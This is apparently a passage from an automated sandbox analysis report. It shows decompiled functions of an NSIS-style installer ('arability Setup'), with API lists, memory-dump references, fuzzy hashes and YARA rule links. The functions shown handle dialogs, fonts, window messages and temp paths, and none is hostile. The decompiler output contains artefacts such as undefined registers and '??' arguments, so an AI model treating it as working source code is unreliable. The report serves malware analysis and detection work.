                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CloseEnum$DeleteValue
                                                                                    • String ID:
                                                                                    • API String ID: 1354259210-0
                                                                                    • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                                    • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                                                    • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                                    • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 77%
                                                                                    			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x42f420,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E00406055();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                                    0x00401d65
                                                                                    0x00401d69
                                                                                    0x00401d7e
                                                                                    0x00401d6b
                                                                                    0x00401d6d
                                                                                    0x00401d73
                                                                                    0x00401d73
                                                                                    0x00401d84
                                                                                    0x00401d87
                                                                                    0x00401d91
                                                                                    0x00401d94
                                                                                    0x00401d9c
                                                                                    0x00401dad
                                                                                    0x00401db0
                                                                                    0x00401dbb
                                                                                    0x00401db2
                                                                                    0x00401db4
                                                                                    0x00401db4
                                                                                    0x00401dbf
                                                                                    0x00401dcc
                                                                                    0x00401df3
                                                                                    0x00401e02
                                                                                    0x00401e10
                                                                                    0x00401e18
                                                                                    0x00401e20
                                                                                    0x00401e20
                                                                                    0x00401e29
                                                                                    0x00401e2f
                                                                                    0x004029a5
                                                                                    0x004029a5
                                                                                    0x00402a5d
                                                                                    0x00402a69

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                    • String ID:
                                                                                    • API String ID: 1849352358-0
                                                                                    • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                                                    • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                                                    • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                                                    • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 73%
                                                                                    			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b838->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b848 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b84f = 1;
				 *0x40b84c = _t15 & 0x00000001;
				 *0x40b84d = _t15 & 0x00000002;
				 *0x40b84e = _t15 & 0x00000004;
				E0040618A(_t9, _t31, _t33, 0x40b854,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b838);
				_push(_t18);
				_push(_t33);
				E00406055();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                                    0x00401e35
                                                                                    0x00401e40
                                                                                    0x00401e42
                                                                                    0x00401e4f
                                                                                    0x00401e66
                                                                                    0x00401e6b
                                                                                    0x00401e78
                                                                                    0x00401e7d
                                                                                    0x00401e81
                                                                                    0x00401e8c
                                                                                    0x00401e93
                                                                                    0x00401ea5
                                                                                    0x00401eab
                                                                                    0x00401eb0
                                                                                    0x00401eba
                                                                                    0x00402620
                                                                                    0x00401569
                                                                                    0x004029a5
                                                                                    0x00402a5d
                                                                                    0x00402a69

                                                                                    APIs
                                                                                    • GetDC.USER32(?), ref: 00401E38
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                                    • ReleaseDC.USER32 ref: 00401E6B
                                                                                    • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                    • String ID:
                                                                                    • API String ID: 3808545654-0
                                                                                    • Opcode ID: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
                                                                                    • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                                                    • Opcode Fuzzy Hash: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
                                                                                    • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 59%
                                                                                    			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00406055();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                                    0x00401c2e
                                                                                    0x00401c30
                                                                                    0x00401c37
                                                                                    0x00401c3a
                                                                                    0x00401c3d
                                                                                    0x00401c47
                                                                                    0x00401c4b
                                                                                    0x00401c4e
                                                                                    0x00401c57
                                                                                    0x00401c57
                                                                                    0x00401c5a
                                                                                    0x00401c5e
                                                                                    0x00401c67
                                                                                    0x00401c67
                                                                                    0x00401c6a
                                                                                    0x00401c6e
                                                                                    0x00401c70
                                                                                    0x00401cc5
                                                                                    0x00401cc7
                                                                                    0x00401cd0
                                                                                    0x00401cd8
                                                                                    0x00401cdb
                                                                                    0x00401cdb
                                                                                    0x00401ce4
                                                                                    0x00000000
                                                                                    0x00401c72
                                                                                    0x00401c79
                                                                                    0x00401c7b
                                                                                    0x00401c7e
                                                                                    0x00401c84
                                                                                    0x00401c8b
                                                                                    0x00401c8e
                                                                                    0x00401cb6
                                                                                    0x00401cea
                                                                                    0x00401cea
                                                                                    0x00401c90
                                                                                    0x00401c9e
                                                                                    0x00401ca6
                                                                                    0x00401ca9
                                                                                    0x00401ca9
                                                                                    0x00401c8e
                                                                                    0x00401ced
                                                                                    0x00401cf0
                                                                                    0x00401cf6
                                                                                    0x004029a5
                                                                                    0x004029a5
                                                                                    0x00402a5d
                                                                                    0x00402a69

                                                                                    APIs
                                                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Timeout
                                                                                    • String ID: !
                                                                                    • API String ID: 1777923405-2657877971
                                                                                    • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                                    • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                                                    • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                                    • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004049C4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 77%
                                                                                    			E004049C4(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E0040618A(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E0040618A(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E0040618A(_t41, _t47, 0x42a890, 0x42a890, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a890), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a890);
			}



















                                                                                    0x004049ca
                                                                                    0x004049cf
                                                                                    0x004049d7
                                                                                    0x004049d8
                                                                                    0x004049e5
                                                                                    0x004049ed
                                                                                    0x004049ee
                                                                                    0x004049f0
                                                                                    0x004049f2
                                                                                    0x004049f4
                                                                                    0x004049f7
                                                                                    0x004049f7
                                                                                    0x004049fe
                                                                                    0x00404a04
                                                                                    0x00404a04
                                                                                    0x00404a0b
                                                                                    0x00404a12
                                                                                    0x00404a15
                                                                                    0x00404a18
                                                                                    0x00404a18
                                                                                    0x00404a1c
                                                                                    0x00404a2c
                                                                                    0x00404a2e
                                                                                    0x00404a31
                                                                                    0x004049da
                                                                                    0x004049da
                                                                                    0x004049e1
                                                                                    0x004049e1
                                                                                    0x00404a39
                                                                                    0x00404a44
                                                                                    0x00404a5a
                                                                                    0x00404a6a
                                                                                    0x00404a86

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                                    • wsprintfA.USER32 ref: 00404A6A
                                                                                    • SetDlgItemTextA.USER32 ref: 00404A7D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                    • String ID: %u.%u%s%s
                                                                                    • API String ID: 3540041739-3551169577
                                                                                    • Opcode ID: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
                                                                                    • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                                                    • Opcode Fuzzy Hash: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
                                                                                    • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405A8F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00405A8F(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




                                                                                    0x00405a90
                                                                                    0x00405aa7
                                                                                    0x00405aaf
                                                                                    0x00405aaf
                                                                                    0x00405ab7

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                                                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                                                    • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 2659869361-3081826266
                                                                                    • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                    • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                                                    • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                    • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00402E3D, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00402E3D(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x429448 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x42f430) {
							_t3 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402DBA, 0);
							 *0x429448 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E0040653C(0);
					}
				} else {
					_t6 =  *0x429448;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x429448 = 0;
					return _t6;
				}
			}






                                                                                    0x00402e44
                                                                                    0x00402e64
                                                                                    0x00402e6e
                                                                                    0x00402e7a
                                                                                    0x00402e8b
                                                                                    0x00402e94
                                                                                    0x00000000
                                                                                    0x00402e99
                                                                                    0x00402ea0
                                                                                    0x00402e66
                                                                                    0x00402e6d
                                                                                    0x00402e6d
                                                                                    0x00402e46
                                                                                    0x00402e46
                                                                                    0x00402e4d
                                                                                    0x00402e50
                                                                                    0x00402e50
                                                                                    0x00402e56
                                                                                    0x00402e5d
                                                                                    0x00402e5d

                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?,00000000,0040301B,00000001), ref: 00402E50
                                                                                    • GetTickCount.KERNEL32 ref: 00402E6E
                                                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                    • String ID:
                                                                                    • API String ID: 2102729457-0
                                                                                    • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                                    • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                                                    • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                                    • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405B7D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 53%
                                                                                    			E00405B7D(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E004060F7(0x42bc98, _a4);
				_t21 = E00405B28(0x42bc98);
				if(_t21 != 0) {
					E004063D2(_t21);
					if(( *0x42f43c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x42bc98;
						while(1) {
							_t11 = lstrlenA(0x42bc98);
							_push(0x42bc98);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E0040646B();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405AD6(0x42bc98);
								continue;
							} else {
								goto L1;
							}
						}
						E00405A8F();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                                                    0x00405b89
                                                                                    0x00405b94
                                                                                    0x00405b98
                                                                                    0x00405b9f
                                                                                    0x00405bab
                                                                                    0x00405bb7
                                                                                    0x00405bb7
                                                                                    0x00405bcf
                                                                                    0x00405bd0
                                                                                    0x00405bd7
                                                                                    0x00405bd8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405bbb
                                                                                    0x00405bc2
                                                                                    0x00405bca
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405bc2
                                                                                    0x00405bda
                                                                                    0x00000000
                                                                                    0x00405bee
                                                                                    0x00405bad
                                                                                    0x00405bb1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405bb1
                                                                                    0x00405b9a
                                                                                    0x00000000

                                                                                    APIs
                                                                                      • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,arability Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                                      • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                                      • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                                      • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                                    • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                                                    • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,73BCFA90,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 3248276644-3081826266
                                                                                    • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                                    • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                                                    • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                                    • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                                                    Uniqueness

